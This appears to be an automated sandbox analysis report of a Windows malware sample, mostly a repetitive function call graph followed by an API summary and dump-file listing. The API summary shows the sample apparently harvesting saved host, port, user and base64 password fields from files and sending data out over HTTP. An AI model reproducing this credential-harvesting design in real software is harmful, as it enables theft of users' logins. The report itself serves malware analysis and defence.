fe3d5f 57847->57848 57849 fe47d9 3 API calls 57848->57849 57850 fe3d76 57849->57850 57851 fe47d9 3 API calls 57850->57851 57852 fe3d8d 57851->57852 57853 fe47d9 3 API calls 57852->57853 57854 fe3da4 57853->57854 57855 fe47d9 3 API calls 57854->57855 57856 fe3dbb 57855->57856 57857 fe47d9 3 API calls 57856->57857 57858 fe3dd2 57857->57858 57859 fe47d9 3 API calls 57858->57859 57860 fe3de9 57859->57860 57861 fe47d9 3 API calls 57860->57861 57862 fe3e00 57861->57862 57863 fe47d9 3 API calls 57862->57863 57864 fe3e17 57863->57864 57865 fe47d9 3 API calls 57864->57865 57866 fe3e31 57865->57866 57867 fe47d9 3 API calls 57866->57867 57868 fe3e48 57867->57868 57869 fe47d9 3 API calls 57868->57869 57870 fe3e5f 57869->57870 57871 fe47d9 3 API calls 57870->57871 57872 fe3e75 57871->57872 57873 fe47d9 3 API calls 57872->57873 57874 fe3e8c 57873->57874 57875 fe47d9 3 API calls 57874->57875 57876 fe3ea3 57875->57876 57877 fe47d9 3 API calls 57876->57877 57878 fe3eba 57877->57878 57879 fe47d9 3 API calls 57878->57879 57880 fe3ed1 57879->57880 57881 fe47d9 3 API calls 57880->57881 
57882 fe3eeb 57881->57882 57883 fe47d9 3 API calls 57882->57883 57884 fe3f01 57883->57884 57885 fe47d9 3 API calls 57884->57885 57886 fe3f18 57885->57886 57887 fe47d9 3 API calls 57886->57887 57888 fe3f2f 57887->57888 57889 fe47d9 3 API calls 57888->57889 57890 fe3f46 57889->57890 57891 fe47d9 3 API calls 57890->57891 57892 fe3f5d 57891->57892 57893 fe47d9 3 API calls 57892->57893 57894 fe3f71 57893->57894 57895 fe47d9 3 API calls 57894->57895 57896 fe3f88 57895->57896 57897 fe47d9 3 API calls 57896->57897 57898 fe3fa2 57897->57898 57899 fe47d9 3 API calls 57898->57899 57900 fe3fb8 57899->57900 57901 fe47d9 3 API calls 57900->57901 57902 fe3fcf 57901->57902 57903 fe47d9 3 API calls 57902->57903 57904 fe3fe3 57903->57904 57905 fe47d9 3 API calls 57904->57905 57906 fe3ffa 57905->57906 57907 fe47d9 3 API calls 57906->57907 57908 fe4011 57907->57908 57909 fe47d9 3 API calls 57908->57909 57910 fe4028 57909->57910 57911 fe47d9 3 API calls 57910->57911 57912 fe403f 57911->57912 57913 fe47d9 3 API calls 57912->57913 57914 fe4058 57913->57914 57915 fe47d9 3 API calls 57914->57915 57916 fe406f 57915->57916 57917 fe47d9 3 API calls 57916->57917 57918 fe4085 57917->57918 57919 fe47d9 3 API calls 57918->57919 57920 fe4099 57919->57920 57921 fe47d9 3 API calls 57920->57921 57922 fe40b0 57921->57922 57923 fe47d9 3 API calls 57922->57923 57924 fe40c7 57923->57924 57925 fe47d9 3 API calls 57924->57925 57926 fe40de 57925->57926 57927 fe47d9 3 API calls 57926->57927 57928 fe40f5 57927->57928 57929 fe47d9 3 API calls 57928->57929 57930 fe410f 57929->57930 57931 fe47d9 3 API calls 57930->57931 57932 fe4126 57931->57932 57933 fe47d9 3 API calls 57932->57933 57934 fe413d 57933->57934 57935 fe47d9 3 API calls 57934->57935 57936 fe4154 57935->57936 57937 fe47d9 3 API calls 57936->57937 57938 fe416a 57937->57938 57939 fe47d9 3 API calls 57938->57939 57940 fe417e 57939->57940 57941 fe47d9 3 API calls 57940->57941 57942 fe4192 57941->57942 57943 fe47d9 3 API calls 57942->57943 57944 fe41a9 
57943->57944 57945 fe47d9 3 API calls 57944->57945 57946 fe41c3 57945->57946 57947 fe47d9 3 API calls 57946->57947 57948 fe41d9 57947->57948 57949 fe47d9 3 API calls 57948->57949 57950 fe41f0 57949->57950 57951 fe47d9 3 API calls 57950->57951 57952 fe4207 57951->57952 57953 fe47d9 3 API calls 57952->57953 57954 fe421e 57953->57954 57955 fe47d9 3 API calls 57954->57955 57956 fe4235 57955->57956 57957 fe47d9 3 API calls 57956->57957 57958 fe4249 57957->57958 57959 fe47d9 3 API calls 57958->57959 57960 fe425f 57959->57960 57961 fe47d9 3 API calls 57960->57961 57962 fe4279 57961->57962 57963 fe47d9 3 API calls 57962->57963 57964 fe4290 57963->57964 57965 fe47d9 3 API calls 57964->57965 57966 fe42a7 57965->57966 57967 fe47d9 3 API calls 57966->57967 57968 fe42bd 57967->57968 57969 fe47d9 3 API calls 57968->57969 57970 fe42d4 57969->57970 57971 fe47d9 3 API calls 57970->57971 57972 fe42eb 57971->57972 57973 fe47d9 3 API calls 57972->57973 57974 fe4302 57973->57974 57975 fe47d9 3 API calls 57974->57975 57976 fe4316 57975->57976 57977 fe47d9 3 API calls 57976->57977 57978 fe432d 57977->57978 57979 fe47d9 3 API calls 57978->57979 57980 fe4344 57979->57980 57981 fe47d9 3 API calls 57980->57981 57982 fe435b 57981->57982 57983 fe47d9 3 API calls 57982->57983 57984 fe4372 57983->57984 57985 fe47d9 3 API calls 57984->57985 57986 fe4386 57985->57986 57987 fe47d9 3 API calls 57986->57987 57988 fe439d 57987->57988 57989 fe47d9 3 API calls 57988->57989 57990 fe43b4 57989->57990 57991 fe47d9 3 API calls 57990->57991 57992 fe43cb 57991->57992 57993 fe47d9 3 API calls 57992->57993 57994 fe43e2 57993->57994 57995 fe47d9 3 API calls 57994->57995 57996 fe43f9 57995->57996 57997 fe47d9 3 API calls 57996->57997 57998 fe440d 57997->57998 57999 fe47d9 3 API calls 57998->57999 58000 fe4424 57999->58000 58001 fe47d9 3 API calls 58000->58001 58002 fe443b 58001->58002 58003 fe47d9 3 API calls 58002->58003 58004 fe444f 58003->58004 58005 fe47d9 3 API calls 58004->58005 58006 fe4463 58005->58006 
58007 fe47d9 3 API calls 58006->58007 58008 fe4477 58007->58008 58009 fe47d9 3 API calls 58008->58009 58010 fe4491 58009->58010 58011 fe47d9 3 API calls 58010->58011 58012 fe44a8 58011->58012 58013 fe47d9 3 API calls 58012->58013 58014 fe44be 58013->58014 58015 fe47d9 3 API calls 58014->58015 58016 fe44d5 58015->58016 58017 fe47d9 3 API calls 58016->58017 58018 fe44eb 58017->58018 58019 fe47d9 3 API calls 58018->58019 58020 fe4502 58019->58020 58021 fe47d9 3 API calls 58020->58021 58022 fe4519 58021->58022 58023 fe47d9 3 API calls 58022->58023 58024 fe452f 58023->58024 58025 fe47d9 3 API calls 58024->58025 58026 fe4549 58025->58026 58027 fe47d9 3 API calls 58026->58027 58028 fe4560 58027->58028 58029 fe47d9 3 API calls 58028->58029 58030 fe4577 58029->58030 58031 fe47d9 3 API calls 58030->58031 58032 fe458e 58031->58032 58033 fe47d9 3 API calls 58032->58033 58034 fe45a5 58033->58034 58035 fe47d9 3 API calls 58034->58035 58036 fe45bc 58035->58036 58037 fe47d9 3 API calls 58036->58037 58038 fe45d3 58037->58038 58039 fe47d9 3 API calls 58038->58039 58040 fe45ea 58039->58040 58041 fe47d9 3 API calls 58040->58041 58042 fe4603 58041->58042 58043 fe47d9 3 API calls 58042->58043 58044 fe461a 58043->58044 58045 fe47d9 3 API calls 58044->58045 58046 fe4633 58045->58046 58047 fe47d9 3 API calls 58046->58047 58048 fe4647 58047->58048 58049 fe47d9 3 API calls 58048->58049 58050 fe465e 58049->58050 58051 fe47d9 3 API calls 58050->58051 58052 fe4675 58051->58052 58053 fe47d9 3 API calls 58052->58053 58054 fe468c 58053->58054 58055 fe47d9 3 API calls 58054->58055 58056 fe46a3 58055->58056 58057 fe47d9 3 API calls 58056->58057 58058 fe46bd 58057->58058 58059 fe47d9 3 API calls 58058->58059 58060 fe46d4 58059->58060 58061 fe47d9 3 API calls 58060->58061 58062 fe46ea 58061->58062 58063 fe47d9 3 API calls 58062->58063 58064 fe4701 58063->58064 58065 fe47d9 3 API calls 58064->58065 58066 fe4718 58065->58066 58067 fe47d9 3 API calls 58066->58067 58068 fe472e 58067->58068 58069 fe47d9 3 
API calls 58068->58069 58070 fe4745 58069->58070 58071 fe47d9 3 API calls 58070->58071 58072 fe4759 58071->58072 58073 fe47d9 3 API calls 58072->58073 58074 fe4772 58073->58074 58075 fe47d9 3 API calls 58074->58075 58076 fe4788 58075->58076 58077 fe47d9 3 API calls 58076->58077 58078 fe479f 58077->58078 58079 fe47d9 3 API calls 58078->58079 58080 fe47b6 58079->58080 58081 fe47d9 3 API calls 58080->58081 58082 fe47cd 58081->58082 58082->57296 58084 ff070a lstrcpyA 58083->58084 58085 ff1e8a 58084->58085 58086 ff070a lstrcpyA 58085->58086 58087 ff1e98 GetSystemTime 58086->58087 58088 ff1eb4 58087->58088 58089 ffcab4 ___init_ctype 5 API calls 58088->58089 58090 ff1eeb 58089->58090 58090->57300 58093 ff0804 58091->58093 58092 ff0828 58092->57308 58093->58092 58094 ff0816 lstrcpyA lstrcatA 58093->58094 58094->58092 58096 ff073c lstrcpyA 58095->58096 58097 fe1cf7 58096->58097 58098 ff073c lstrcpyA 58097->58098 58099 fe1d02 58098->58099 58100 ff073c lstrcpyA 58099->58100 58101 fe1d0d 58100->58101 58102 ff073c lstrcpyA 58101->58102 58103 fe1d24 58102->58103 58104 ff6b93 58103->58104 58105 ff076c 2 API calls 58104->58105 58106 ff6bc9 58105->58106 58107 ff076c 2 API calls 58106->58107 58108 ff6bd6 58107->58108 58109 ff076c 2 API calls 58108->58109 58110 ff6be3 58109->58110 58111 ff070a lstrcpyA 58110->58111 58112 ff6bf0 58111->58112 58113 ff070a lstrcpyA 58112->58113 58114 ff6bfd 58113->58114 58115 ff070a lstrcpyA 58114->58115 58116 ff6c0a 58115->58116 58117 ff070a lstrcpyA 58116->58117 58118 ff6c17 58117->58118 58119 ff070a lstrcpyA 58118->58119 58120 ff6c24 58119->58120 58121 ff070a lstrcpyA 58120->58121 58140 ff6c31 58121->58140 58124 ff6c75 StrCmpCA 58125 ff6cce StrCmpCA 58124->58125 58124->58140 58126 ff6eb1 58125->58126 58125->58140 58129 ff07b0 lstrcpyA 58126->58129 58130 ff6ebc 58129->58130 58132 ff070a lstrcpyA 58130->58132 58133 ff6ec9 58132->58133 58135 ff07b0 lstrcpyA 58133->58135 58134 fe1ced lstrcpyA 58134->58140 58139 ff6e09 58135->58139 58136 ff6a1b 28 API 
calls 58136->58140 58137 ff6aa3 33 API calls 58137->58140 58138 ff07b0 lstrcpyA 58138->58140 58141 ff070a lstrcpyA 58139->58141 58140->58124 58140->58125 58140->58134 58140->58136 58140->58137 58140->58138 58143 ff6d2e StrCmpCA 58140->58143 58145 ff6d87 StrCmpCA 58140->58145 58156 ff073c lstrcpyA 58140->58156 59048 fe29e8 58140->59048 59051 fe29f9 58140->59051 59054 fe2a1b 58140->59054 59057 fe2a2c 58140->59057 59067 fe2a0a lstrcpyA 58140->59067 59068 fe2a3d lstrcpyA 58140->59068 58142 ff6ee8 58141->58142 58144 ff07b0 lstrcpyA 58142->58144 58143->58140 58143->58145 58151 ff6ef2 58144->58151 58147 ff6d9d StrCmpCA 58145->58147 58148 ff6e80 58145->58148 58149 ff6e4f 58147->58149 58150 ff6db3 StrCmpCA 58147->58150 58152 ff07b0 lstrcpyA 58148->58152 58157 ff07b0 lstrcpyA 58149->58157 58154 ff6e1b 58150->58154 58155 ff6dc5 StrCmpCA 58150->58155 59060 ff6f7f 58151->59060 58153 ff6e8b 58152->58153 58159 ff070a lstrcpyA 58153->58159 58163 ff07b0 lstrcpyA 58154->58163 58160 ff6de7 58155->58160 58161 ff6dd7 Sleep 58155->58161 58156->58140 58162 ff6e5a 58157->58162 58164 ff6e98 58159->58164 58165 ff07b0 lstrcpyA 58160->58165 58161->58140 58166 ff070a lstrcpyA 58162->58166 58167 ff6e26 58163->58167 58168 ff07b0 lstrcpyA 58164->58168 58169 ff6df2 58165->58169 58170 ff6e67 58166->58170 58171 ff070a lstrcpyA 58167->58171 58168->58139 58173 ff070a lstrcpyA 58169->58173 58174 ff07b0 lstrcpyA 58170->58174 58172 ff6e33 58171->58172 58175 ff07b0 lstrcpyA 58172->58175 58176 ff6dff 58173->58176 58174->58139 58175->58139 58177 ff07b0 lstrcpyA 58176->58177 58177->58139 58178 ff6f05 58178->57314 58180 ff07b0 lstrcpyA 58179->58180 58181 ff7cd9 58180->58181 58182 ff07b0 lstrcpyA 58181->58182 58183 ff7ce4 58182->58183 58184 ff07b0 lstrcpyA 58183->58184 58185 ff7cef 58184->58185 58185->57316 58187 ff074c 58186->58187 58188 ff0761 58187->58188 58189 ff0759 lstrcpyA 58187->58189 58188->57323 58189->58188 58191 ff0c09 GetVolumeInformationA 58190->58191 58192 ff0c02 58190->58192 58193 ff0c70 
58191->58193 58192->58191 58193->58193 58194 ff0c85 GetProcessHeap HeapAlloc 58193->58194 58195 ff0caf wsprintfA lstrcatA 58194->58195 58196 ff0ca0 58194->58196 59069 ff18a7 GetCurrentHwProfileA 58195->59069 58197 ff070a lstrcpyA 58196->58197 58200 ff0ca8 58197->58200 58199 ff0cea lstrlenA 59085 ff27a7 lstrcpyA malloc strncpy 58199->59085 58203 ffcab4 ___init_ctype 5 API calls 58200->58203 58202 ff0d0d lstrcatA 58205 ff0d24 58202->58205 58204 ff0d51 58203->58204 58204->57338 58206 ff070a lstrcpyA 58205->58206 58207 ff0d3b 58206->58207 58207->58200 58209 ff073c lstrcpyA 58208->58209 58210 fe4b4b 58209->58210 59089 fe4aa7 58210->59089 58212 fe4b57 58213 ff070a lstrcpyA 58212->58213 58214 fe4b73 58213->58214 58215 ff070a lstrcpyA 58214->58215 58216 fe4b83 58215->58216 58217 ff070a lstrcpyA 58216->58217 58218 fe4b93 58217->58218 58219 ff070a lstrcpyA 58218->58219 58220 fe4ba3 58219->58220 58221 ff070a lstrcpyA 58220->58221 58222 fe4bb3 InternetOpenA StrCmpCA 58221->58222 58223 fe4be7 58222->58223 58224 fe4bf9 58223->58224 58225 fe5186 InternetCloseHandle 58223->58225 58226 ff1e6d 7 API calls 58224->58226 58236 fe51d3 58225->58236 58227 fe4c07 58226->58227 58228 ff07ea 2 API calls 58227->58228 58229 fe4c1a 58228->58229 58230 ff07b0 lstrcpyA 58229->58230 58231 fe4c25 58230->58231 58232 ff082c 3 API calls 58231->58232 58233 fe4c51 58232->58233 58234 ff07b0 lstrcpyA 58233->58234 58235 fe4c5c 58234->58235 58237 ff082c 3 API calls 58235->58237 58238 ffcab4 ___init_ctype 5 API calls 58236->58238 58239 fe4c7d 58237->58239 58240 fe5227 58238->58240 58241 ff07b0 lstrcpyA 58239->58241 58342 ff3b9f StrCmpCA 58240->58342 58242 fe4c88 58241->58242 58243 ff07ea 2 API calls 58242->58243 58244 fe4caa 58243->58244 58245 ff07b0 lstrcpyA 58244->58245 58246 fe4cb5 58245->58246 58247 ff082c 3 API calls 58246->58247 58248 fe4cd6 58247->58248 58249 ff07b0 lstrcpyA 58248->58249 58250 fe4ce1 58249->58250 58251 ff082c 3 API calls 58250->58251 58252 fe4d02 58251->58252 58253 ff07b0 lstrcpyA 
58252->58253 58254 fe4d0d 58253->58254 58255 ff082c 3 API calls 58254->58255 58256 fe4d2f 58255->58256 58257 ff07ea 2 API calls 58256->58257 58258 fe4d3a 58257->58258 58259 ff07b0 lstrcpyA 58258->58259 58260 fe4d45 58259->58260 58261 fe4d5b InternetConnectA 58260->58261 58261->58225 58262 fe4d89 HttpOpenRequestA 58261->58262 58263 fe517a InternetCloseHandle 58262->58263 58264 fe4dc9 58262->58264 58263->58225 58265 fe4ded 58264->58265 58266 fe4dd1 InternetSetOptionA 58264->58266 58267 ff082c 3 API calls 58265->58267 58266->58265 58268 fe4e03 58267->58268 58269 ff07b0 lstrcpyA 58268->58269 58270 fe4e0e 58269->58270 58271 ff07ea 2 API calls 58270->58271 58272 fe4e30 58271->58272 58273 ff07b0 lstrcpyA 58272->58273 58274 fe4e3b 58273->58274 58275 ff082c 3 API calls 58274->58275 58276 fe4e5c 58275->58276 58277 ff07b0 lstrcpyA 58276->58277 58278 fe4e67 58277->58278 58279 ff082c 3 API calls 58278->58279 58280 fe4e89 58279->58280 58281 ff07b0 lstrcpyA 58280->58281 58282 fe4e94 58281->58282 58283 ff082c 3 API calls 58282->58283 58284 fe4eb5 58283->58284 58285 ff07b0 lstrcpyA 58284->58285 58286 fe4ec0 58285->58286 58287 ff082c 3 API calls 58286->58287 58288 fe4ee1 58287->58288 58289 ff07b0 lstrcpyA 58288->58289 58290 fe4eec 58289->58290 58291 ff07ea 2 API calls 58290->58291 58292 fe4f0b 58291->58292 58293 ff07b0 lstrcpyA 58292->58293 58294 fe4f16 58293->58294 58295 ff082c 3 API calls 58294->58295 58296 fe4f37 58295->58296 58297 ff07b0 lstrcpyA 58296->58297 58298 fe4f42 58297->58298 58299 ff082c 3 API calls 58298->58299 58300 fe4f63 58299->58300 58301 ff07b0 lstrcpyA 58300->58301 58302 fe4f6e 58301->58302 58303 ff07ea 2 API calls 58302->58303 58304 fe4f90 58303->58304 58305 ff07b0 lstrcpyA 58304->58305 58306 fe4f9b 58305->58306 58307 ff082c 3 API calls 58306->58307 58308 fe4fbc 58307->58308 58309 ff07b0 lstrcpyA 58308->58309 58310 fe4fc7 58309->58310 58311 ff082c 3 API calls 58310->58311 58312 fe4fe9 58311->58312 58313 ff07b0 lstrcpyA 58312->58313 58314 fe4ff4 58313->58314 
58315 ff082c 3 API calls 58314->58315 58316 fe5015 58315->58316 58317 ff07b0 lstrcpyA 58316->58317 58318 fe5020 58317->58318 58319 ff082c 3 API calls 58318->58319 58320 fe5041 58319->58320 58321 ff07b0 lstrcpyA 58320->58321 58322 fe504c 58321->58322 58323 ff07ea 2 API calls 58322->58323 58324 fe506b 58323->58324 58325 ff07b0 lstrcpyA 58324->58325 58326 fe5076 58325->58326 58327 ff070a lstrcpyA 58326->58327 58328 fe5091 58327->58328 58329 ff07ea 2 API calls 58328->58329 58330 fe50a8 58329->58330 58331 ff07ea 2 API calls 58330->58331 58332 fe50b9 58331->58332 58333 ff07b0 lstrcpyA 58332->58333 58334 fe50c4 58333->58334 58335 fe50da lstrlenA lstrlenA HttpSendRequestA 58334->58335 58336 fe514e InternetReadFile 58335->58336 58337 fe5168 InternetCloseHandle 58336->58337 58340 fe510e 58336->58340 58338 fe2910 58337->58338 58338->58263 58339 ff082c 3 API calls 58339->58340 58340->58336 58340->58337 58340->58339 58341 ff07b0 lstrcpyA 58340->58341 58341->58340 58343 ff3bbe ExitProcess 58342->58343 58344 ff3bc5 strtok_s 58342->58344 58346 ff3d25 58344->58346 58357 ff3be1 58344->58357 58345 ff3d07 strtok_s 58345->58346 58345->58357 58346->57343 58347 ff3bfe StrCmpCA 58347->58345 58347->58357 58348 ff3c7c StrCmpCA 58348->58345 58348->58357 58349 ff3cbb StrCmpCA 58349->58345 58350 ff3c1a StrCmpCA 58350->58345 58350->58357 58351 ff3c36 StrCmpCA 58351->58345 58351->58357 58352 ff3ca6 StrCmpCA 58352->58345 58352->58357 58353 ff3cf3 StrCmpCA 58353->58345 58354 ff3c52 StrCmpCA 58354->58345 58354->58357 58355 ff3c91 StrCmpCA 58355->58345 58355->58357 58356 ff3cd1 StrCmpCA 58356->58345 58357->58345 58357->58347 58357->58348 58357->58349 58357->58350 58357->58351 58357->58352 58357->58353 58357->58354 58357->58355 58357->58356 58358 ff076c 2 API calls 58357->58358 58358->58357 58360 ff073c lstrcpyA 58359->58360 58361 fe5f56 58360->58361 58362 fe4aa7 5 API calls 58361->58362 58363 fe5f62 58362->58363 58364 ff070a lstrcpyA 58363->58364 58365 fe5f7e 58364->58365 58366 ff070a lstrcpyA 
58365->58366 58367 fe5f8e 58366->58367 58368 ff070a lstrcpyA 58367->58368 58369 fe5f9e 58368->58369 58370 ff070a lstrcpyA 58369->58370 58371 fe5fae 58370->58371 58372 ff070a lstrcpyA 58371->58372 58373 fe5fbe InternetOpenA StrCmpCA 58372->58373 58374 fe5ff2 58373->58374 58375 fe6004 58374->58375 58376 fe66f1 InternetCloseHandle 58374->58376 58378 ff1e6d 7 API calls 58375->58378 59093 fe8696 CryptStringToBinaryA 58376->59093 58380 fe6012 58378->58380 58381 ff07ea 2 API calls 58380->58381 58383 fe6025 58381->58383 58382 ff076c 2 API calls 58384 fe672b 58382->58384 58385 ff07b0 lstrcpyA 58383->58385 58386 ff082c 3 API calls 58384->58386 58389 fe6030 58385->58389 58387 fe6742 58386->58387 58388 ff07b0 lstrcpyA 58387->58388 58394 fe674d 58388->58394 58390 ff082c 3 API calls 58389->58390 58391 fe605c 58390->58391 58392 ff07b0 lstrcpyA 58391->58392 58393 fe6067 58392->58393 58396 ff082c 3 API calls 58393->58396 58395 ffcab4 ___init_ctype 5 API calls 58394->58395 58397 fe67dd 58395->58397 58398 fe6088 58396->58398 58527 ff3603 strtok_s 58397->58527 58399 ff07b0 lstrcpyA 58398->58399 58400 fe6093 58399->58400 58401 ff07ea 2 API calls 58400->58401 58402 fe60b5 58401->58402 58403 ff07b0 lstrcpyA 58402->58403 58404 fe60c0 58403->58404 58405 ff082c 3 API calls 58404->58405 58406 fe60e1 58405->58406 58407 ff07b0 lstrcpyA 58406->58407 58408 fe60ec 58407->58408 58409 ff082c 3 API calls 58408->58409 58410 fe610d 58409->58410 58411 ff07b0 lstrcpyA 58410->58411 58412 fe6118 58411->58412 58413 ff082c 3 API calls 58412->58413 58414 fe613a 58413->58414 58415 ff07ea 2 API calls 58414->58415 58416 fe6145 58415->58416 58417 ff07b0 lstrcpyA 58416->58417 58418 fe6150 58417->58418 58419 fe6166 InternetConnectA 58418->58419 58419->58376 58420 fe6194 HttpOpenRequestA 58419->58420 58421 fe61d4 58420->58421 58422 fe66e5 InternetCloseHandle 58420->58422 58423 fe61dc InternetSetOptionA 58421->58423 58424 fe61f8 58421->58424 58422->58376 58423->58424 58425 ff082c 3 API calls 58424->58425 58426 
fe620e 58425->58426 58427 ff07b0 lstrcpyA 58426->58427 58428 fe6219 58427->58428 58429 ff07ea 2 API calls 58428->58429 58430 fe623b 58429->58430 58431 ff07b0 lstrcpyA 58430->58431 58432 fe6246 58431->58432 58433 ff082c 3 API calls 58432->58433 58434 fe6267 58433->58434 58435 ff07b0 lstrcpyA 58434->58435 58436 fe6272 58435->58436 58437 ff082c 3 API calls 58436->58437 58438 fe6294 58437->58438 58439 ff07b0 lstrcpyA 58438->58439 58440 fe629f 58439->58440 58441 ff082c 3 API calls 58440->58441 58442 fe62c1 58441->58442 58443 ff07b0 lstrcpyA 58442->58443 58444 fe62cc 58443->58444 58445 ff082c 3 API calls 58444->58445 58446 fe62ed 58445->58446 58447 ff07b0 lstrcpyA 58446->58447 58448 fe62f8 58447->58448 58449 ff07ea 2 API calls 58448->58449 58450 fe6317 58449->58450 58451 ff07b0 lstrcpyA 58450->58451 58452 fe6322 58451->58452 58453 ff082c 3 API calls 58452->58453 58454 fe6343 58453->58454 58455 ff07b0 lstrcpyA 58454->58455 58456 fe634e 58455->58456 58457 ff082c 3 API calls 58456->58457 58458 fe636f 58457->58458 58459 ff07b0 lstrcpyA 58458->58459 58460 fe637a 58459->58460 58461 ff07ea 2 API calls 58460->58461 58462 fe639c 58461->58462 58463 ff07b0 lstrcpyA 58462->58463 58464 fe63a7 58463->58464 58465 ff082c 3 API calls 58464->58465 58466 fe63c8 58465->58466 58467 ff07b0 lstrcpyA 58466->58467 58468 fe63d3 58467->58468 58469 ff082c 3 API calls 58468->58469 58470 fe63f5 58469->58470 58471 ff07b0 lstrcpyA 58470->58471 58472 fe6400 58471->58472 58473 ff082c 3 API calls 58472->58473 58474 fe6421 58473->58474 58475 ff07b0 lstrcpyA 58474->58475 58476 fe642c 58475->58476 58477 ff082c 3 API calls 58476->58477 58478 fe644d 58477->58478 58479 ff07b0 lstrcpyA 58478->58479 58480 fe6458 58479->58480 58481 ff082c 3 API calls 58480->58481 58482 fe6479 58481->58482 58483 ff07b0 lstrcpyA 58482->58483 58484 fe6484 58483->58484 58485 ff082c 3 API calls 58484->58485 58486 fe64a5 58485->58486 58487 ff07b0 lstrcpyA 58486->58487 58488 fe64b0 58487->58488 58489 ff082c 3 API calls 58488->58489 58490 

Control-flow Graph

APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
  • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
• strtok_s.MSVCRT ref: 00FEE932
• GetProcessHeap.KERNEL32(00000000,000F423F,01015957,01015956,0101593B,01015937), ref: 00FEE978
• HeapAlloc.KERNEL32(00000000), ref: 00FEE97F
• StrStrA.SHLWAPI(00000000,<Host>), ref: 00FEE993
• lstrlenA.KERNEL32(00000000), ref: 00FEE99E
• StrStrA.SHLWAPI(00000000,<Port>), ref: 00FEE9D2
• lstrlenA.KERNEL32(00000000), ref: 00FEE9DD
• StrStrA.SHLWAPI(00000000,<User>), ref: 00FEEA0B
• lstrlenA.KERNEL32(00000000), ref: 00FEEA16
• StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FEEA44
• lstrlenA.KERNEL32(00000000), ref: 00FEEA4F
• lstrlenA.KERNEL32(?), ref: 00FEEAB5
• lstrlenA.KERNEL32(?), ref: 00FEEAC9
• lstrlenA.KERNEL32(00FEEECA), ref: 00FEEBF1
  • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
  • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B

Strings

Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
